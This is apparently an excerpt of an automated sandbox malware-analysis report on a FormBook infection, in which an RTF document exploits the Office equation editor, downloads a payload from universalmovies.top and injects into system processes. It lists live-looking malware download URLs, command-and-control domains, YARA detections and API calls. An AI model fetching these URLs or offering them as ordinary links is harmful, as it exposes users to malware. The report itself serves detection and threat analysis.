      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.380747.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.380747.net/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.380747.net/btrd/www.emeraldsurrogatefabric.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.380747.netReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agriwithai.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agriwithai.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asia
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agriwithai.comReferer:
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cnoszirzbkaqz.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cnoszirzbkaqz.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cnoszirzbkaqz.comReferer:
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emeraldsurrogatefabric.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emeraldsurrogatefabric.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emeraldsurrogatefabric.com/btrd/www.furryfriendsupply.store
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emeraldsurrogatefabric.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.everslane.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.everslane.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.everslane.com/btrd/www.nvzhuang1.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.everslane.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.furryfriendsupply.store
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.furryfriendsupply.store/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.furryfriendsupply.store/btrd/www.agriwithai.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.furryfriendsupply.storeReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website/btrd/www.cnoszirzbkaqz.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.websiteReferer:
      Source: explorer.exe, 0000000D.00000000.401767743.0000000002177000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923732332.0000000002177000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naddafornadda.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naddafornadda.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naddafornadda.com/btrd/www.turbrun.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naddafornadda.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbbvuhkm5.asia
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbbvuhkm5.asia/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbbvuhkm5.asia/btrd/www.everslane.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngbbvuhkm5.asiaReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nvzhuang1.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nvzhuang1.net/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nvzhuang1.netReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onlynaturlpt.shop
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onlynaturlpt.shop/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onlynaturlpt.shop/btrd/www.wirewizardselectric.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onlynaturlpt.shopReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.outletivo.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.outletivo.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.outletivo.com/btrd/www.380747.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.outletivo.comReferer:
      Source: explorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.com/btrd/www.outletivo.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.com/btrd/www.wzxq.xyz
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.net/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.net/btrd/www.martline.website
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.netReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyz
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyz/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyz/btrd/www.texanboxes.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyzReferer:
      Source: explorer.exe, 0000000D.00000002.924636332.000000000898F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923772394.0000000002A1F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://google.com
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, universalmovies.top.url.0.drString found in binary or memory: https://universalmovies.top/
      Source: nelb.doc.url.0.drString found in binary or memory: https://universalmovies.top/nelb.doc
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scr
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scriiC:
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scrj
      Source: EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scrll
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scrula
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49173 version: TLS 1.2

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.32a5770.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.2296f6c.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.860000.1.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.402124623.0000000000860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: nelb82019.scr PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: nelb82019.scr PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: wlanext.exe PID: 3372, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Microsoft Office drops suspicious files
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nelb.doc.urlJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\universalmovies.top.urlJump to behavior
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\nelb82019.scrJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scrJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009200C4 NtCreateFile,LdrInitializeThunk,11_2_009200C4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,11_2_00920048
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920078 NtResumeThread,LdrInitializeThunk,11_2_00920078
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F9F0 NtClose,LdrInitializeThunk,11_2_0091F9F0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F900 NtReadFile,LdrInitializeThunk,11_2_0091F900
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_0091FAD0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_0091FAE8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_0091FBB8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_0091FB68
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,11_2_0091FC90
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_0091FC60
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FD8C NtDelayExecution,LdrInitializeThunk,11_2_0091FD8C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_0091FDC0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,11_2_0091FEA0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_0091FED0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FFB4 NtCreateSection,LdrInitializeThunk,11_2_0091FFB4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920060 NtQuerySection,11_2_00920060
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009201D4 NtSetValueKey,11_2_009201D4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092010C NtOpenDirectoryObject,11_2_0092010C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009207AC NtCreateMutant,11_2_009207AC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920C40 NtGetContextThread,11_2_00920C40
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009210D0 NtOpenProcessToken,11_2_009210D0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00921148 NtOpenThread,11_2_00921148
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F8CC NtWaitForSingleObject,11_2_0091F8CC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00921930 NtSetContextThread,11_2_00921930
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F938 NtWriteFile,11_2_0091F938
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FAB8 NtQueryValueKey,11_2_0091FAB8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FA20 NtQueryInformationFile,11_2_0091FA20
